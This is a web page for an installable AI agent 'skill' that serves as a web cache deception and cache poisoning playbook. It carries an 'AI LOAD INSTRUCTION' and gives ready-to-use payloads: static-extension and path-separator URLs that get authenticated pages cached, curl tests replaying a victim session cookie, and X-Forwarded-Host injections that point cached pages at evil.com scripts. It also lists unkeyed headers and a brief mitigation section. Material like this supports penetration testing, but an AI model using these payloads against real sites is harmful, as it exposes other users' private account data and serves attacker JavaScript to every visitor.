Loading...
Loading...
Web cache deception and poisoning playbook. Use when CDN, reverse proxy, or application caching may serve sensitive authenticated content to other users due to path confusion or cache key manipulation.
npx skill4agent add yaklang/hack-skills web-cache-deceptionAI LOAD INSTRUCTION: Web cache deception and poisoning techniques. Covers path confusion attacks, CDN cache behavior exploitation, cache key manipulation, and the distinction between cache deception (steal data) and cache poisoning (serve malicious content). Presented by Omer Gil at Black Hat 2017 and significantly expanded since.
Victim visits: https://target.com/account/profile/nonexistent.css
→ Application ignores "nonexistent.css", serves /account/profile (with auth data)
→ CDN sees .css extension → caches the response
→ Attacker fetches: https://target.com/account/profile/nonexistent.css
→ CDN serves cached authenticated content → attacker reads victim's dataGET /page HTTP/1.1
Host: target.com
X-Forwarded-Host: evil.com
→ Application generates: <script src="https://evil.com/js/app.js">
→ Cache stores this response
→ Normal users hit cache → load attacker's JavaScript.css .js .jpg .png .gif .svg .ico
.woff .woff2 .ttf .pdf .json (sometimes)# Append static extension to authenticated endpoint:
https://target.com/api/me/info.css
https://target.com/account/profile/x.js
https://target.com/settings/avatar.png
https://target.com/dashboard/data.json
# Path traversal style:
https://target.com/account/profile/..%2fstatic/app.css# Request as victim (authenticated):
curl -H "Cookie: session=VICTIM" https://target.com/account/profile/x.css
# Check response headers:
# X-Cache: MISS (first request)
# Age: 0
# Request again as attacker (no auth):
curl https://target.com/account/profile/x.css
# Check response:
# X-Cache: HIT
# Contains victim's authenticated content? → vulnerablehttps://target.com/account/profile/tracking.gifHostX-Forwarded-HostX-Forwarded-SchemeX-Original-URL# Test if X-Forwarded-Host is reflected but not keyed:
curl -H "X-Forwarded-Host: evil.com" https://target.com/page
# If response contains evil.com and caches → poisonableX-Forwarded-Host X-Forwarded-Scheme X-Forwarded-Proto
X-Original-URL X-Rewrite-URL X-Host
X-Forwarded-Server Forwarded True-Client-IPGET / HTTP/1.1
Host: target.com
X-Forwarded-Host: evil.com
→ Response: <link href="//evil.com/static/main.css">
→ Cached → all users load attacker's CSS/JS| Component | Behavior |
|---|---|
| CDN (Cloudflare, Akamai) | Caches based on full URL path including extension |
| Application (Rails, Django, Express) | May ignore trailing path segments or extensions |
| Reverse proxy (Nginx) | May strip or rewrite path before forwarding |
# Application treats these as equivalent:
/account/profile
/account/profile/anything
/account/profile/x.css
/account/profile;.css
# CDN treats .css as cacheable static asset
→ Mismatch = vulnerability# Target page uses X-Forwarded-Host to generate meta tags:
GET / HTTP/1.1
Host: target.com
X-Forwarded-Host: evil.com
# Response:
<meta property="og:image" content="https://evil.com/assets/logo.png">
# or:
<link rel="canonical" href="https://evil.com/">
# If response is cached → all users see evil.com references
# Impact: XSS via injected JS path, phishing via canonical redirect, SEO hijack# Semicolon (treated as path parameter by some frameworks):
/account/profile;.css
# Encoded separators:
/account/profile%2F.css
# Trailing dot/space:
/account/profile/.css
/account/profile .css/static/*/assets/*Cache-Control: no-store, privateVary: CookieX-Forwarded-*Cache-Control: no-cache□ Identify CDN/cache layer (X-Cache, Age, Via headers)
□ Append .css/.js/.png to authenticated API endpoints
□ Check if response is cached (X-Cache: HIT on second request)
□ Test path separators: /x.css, ;.css, %2F.css
□ Test unkeyed headers: X-Forwarded-Host, X-Original-URL
□ Verify Cache-Control headers on sensitive endpoints
□ Check Vary header presence
□ Test with and without authentication